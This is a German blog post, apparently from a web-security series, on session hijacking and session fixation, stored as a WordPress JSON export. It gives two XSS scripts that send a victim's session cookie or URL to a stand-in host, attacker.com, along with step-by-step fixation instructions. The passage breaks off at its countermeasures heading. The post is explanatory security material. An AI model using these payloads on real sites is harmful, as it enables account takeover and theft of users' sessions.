{"id":412,"date":"2010-11-28T17:27:08","date_gmt":"2010-11-28T16:27:08","guid":{"rendered":"https:\/\/d-mueller.de\/blog\/?p=412"},"modified":"2016-01-11T23:09:54","modified_gmt":"2016-01-11T22:09:54","slug":"angriffe-auf-webanwendungen-teil-2-session-highjacking-und-session-fixation","status":"publish","type":"post","link":"https:\/\/d-mueller.de\/blog\/angriffe-auf-webanwendungen-teil-2-session-highjacking-und-session-fixation\/","title":{"rendered":"Angriffe auf Webanwendungen \u2013 Teil 2: Session-Highjacking und Session-Fixation"},"content":{"rendered":"

Dieser Post setzt die Kenntnis von XSS<\/a> und die des PHP Session Managements<\/a> voraus.<\/p>\n

Disclaimer<\/h3>\n

Ich beschreibe diese Attacke aus Angreifer-Sicht. Wenn man sich in die Rolle des Angreifers hineinversetzen kann, f\u00e4llt es leichter, weitere Sicherheitsl\u00fccken zu identifizieren. Ich bin also nicht zur dunklen Seite gewechselt und stifte auch nicht dazu an, es zu tun.<\/p>\n

Was ist Session-Highjacking \/ Session-Fixation<\/h3>\n

Eigentlich handelt es sich um ganz simple Verfahren. Beim Session-Highjacking<\/b> versuche ich, an die Session-ID (m)eines Opfers heranzukommen und setze diese Session-ID bei mir selbst. Auf diese Art und Weise gaukle ich dem Server also vor, dass es sich um die selbe Person handelt. Ich erhalte bequem Zugriff auf die Daten des Opfers, da ich ja seine Session hab. Bei der Session-Fixation<\/b> ist der Prozess sehr \u00e4hnlich: Ich juble meinem Opfer aktiv eine Session-ID unter, welche ich bei mir dann selbst setze. Das Opfer meldet sich an und ich habe die Session-ID, welche ich bei mir setze – Das Ergebnis ist in jedem Fall das Gleiche: Ich habe Vollzugriff.<\/p>\n

Wie geht Session-Highjacking?<\/h3>\n

Eine Variante ist ein Man in the middle<\/a>-Angriff, bei dem ich mich zwischen das Opfer und den Router h\u00e4nge und somit die Session-ID per Paketsniffer auslesen kann. Ich m\u00f6chte mich aber eher auf den konventionellen Weg mit Web-Techniken beschr\u00e4nken. Wie ich im Artikel \u00fcbers PHP Session Management<\/a> bereits beschrieben habe, wird die Session-ID entweder per URL in der Form ?PHPSESSID=….<\/i> angehangen oder in einem Session-Cookie auf dem PC des Users gespeichert, der dann bei jedem Request an den Server \u00fcbertragen wird.<\/p>\n

Wenn es mir jetzt also gelingt, mittels XSS-Techniken folgenden Code auf der Webseite zu platzieren:<\/p>\n

\r\n<script>\r\nvar url="http:\/\/www.attacker.com\/getsession.php?session="+document.cookie,\r\n\ttheimg = document.createElement("img");\r\n\t\r\ntheimg.src=url;\r\ndocument.body.appendChild(theimg);\r\ntheimg.style.display="none";\r\n<\/script>\r\n<\/pre>\n
So kriege ich direkt die Session-ID des Benutzers in die H\u00e4nde gespielt. Als n\u00e4chsten Schritt melde ich mich selbst auf der Webseite mit meinem eigenen Account an – dadurch kriege ich ein Session-Cookie dieser Webseite mit meiner Session-ID verpasst. Jetzt kommt das Plugin Cookie Edit<\/a> ins Spiel. Damit editiere ich meinen Session-Cookie und \u00e4ndere die Session-ID auf die des Opfers. Wenn alles gut ging, bin ich nun als mein Opfer eingeloggt.
\n
\"Sessioncookie<\/a>
Sessioncookie editieren<\/p><\/div><\/p>\n
Wenn die Webseite nicht mit Session-Cookies sondern mit dem ?PHPSESSID=…<\/i> – Parameter arbeitet, wird es noch viel einfacher. Dann sieht das per XSS einzuschleusende Script so aus (Abwandlung: document.url<\/i> statt document.cookie<\/i>):<\/p>\n
\r\n<script>\r\nvar url="http:\/\/www.attacker.com\/getsession.php?url="+document.url,\r\n\ttheimg = document.createElement("img");\r\n\t\r\ntheimg.src=url;\r\ndocument.body.appendChild(theimg);\r\ntheimg.style.display="none";\r\n<\/script>\r\n<\/pre>\n
Damit wird die URL \u00fcbertragen, in der ja die Session-ID drinsteckt. Ich selbst brauch nun blos genau diese URL aufrufen und habe damit automatisch die Session-ID des Opfers – einfacher gehts nicht. Voraussetzung ist nat\u00fcrlich, dass ich erstmal mit XSS die Seite manipulieren kann. W\u00e4re das gekl\u00e4rt. N\u00e4chstes Thema.<\/p>\n
Wie geht Session-Fixation?<\/h3>\n
    \n
  1. Ich logge mich auf der Seite mit meinem eigenen Account ein, von der ich den Useraccount meines Opfers stehlen will. <\/li>\n
  2. Mittels Edit Cookie<\/i> kopiere ich meine Session-ID (siehe Bild oben).<\/li>\n
  3. Nun pr\u00fcfe ich, ob die Seite auch den ?PHPSESSID=…<\/i> – Parameter akzeptiert. Dazu einfach per http:\/\/www.webseite.de?PHPSESSID=1234<\/i> \u00fcberpr\u00fcfen, ob ich immer noch eingeloggt bin. Wenn das nicht mehr der Fall ist, wurde meine Session-ID auf 1234 gesetzt, die es nicht gibt. Ist das der Fall, schicke ich meinem Opfer nun einfach den Link http:\/\/www.webseite.de?PHPSESSID=[meine-session-id]<\/i>. Akzeptiert die Webseite keine Session-IDs per Parameter, wird es betr\u00e4chtlich schwieriger und ich muss meinem Opfer einen Session-Cookie mit meiner Session unterjubeln. Das ist dann allerdings wesentlich komplizierter, als auf Session-Highjacking zu setzen, da ich auch wieder eine XSS-L\u00fccke auf der Webseite ausfindig machen muss. Denn nur wenn ich von der betreffenden Webseite selbst den Cookie setze, wird er als valider Session-Cookie akzeptiert.<\/li>\n
  4. Sobald sich das Opfer mit seinem Account anmeldet, habe ich Zugriff. Je nach Aufbau des Angriffs kann es allerdings auch dazu kommen, dass das Opfer pl\u00f6tzlich mit meinem Account eingeloggt ist. Dies gilt es vorher zu pr\u00fcfen (mit verschiedenen Browsern). Sollte das der Fall sein, schicke ich dem Opfer eine frei ausgedachte Session-ID und setze diese dann im Anschluss bei mir selbst.<\/li>\n<\/ol>\n
    Gegenma\u00dfnahmen zum Session-Highjacking und Session-Fixation<\/h3>\n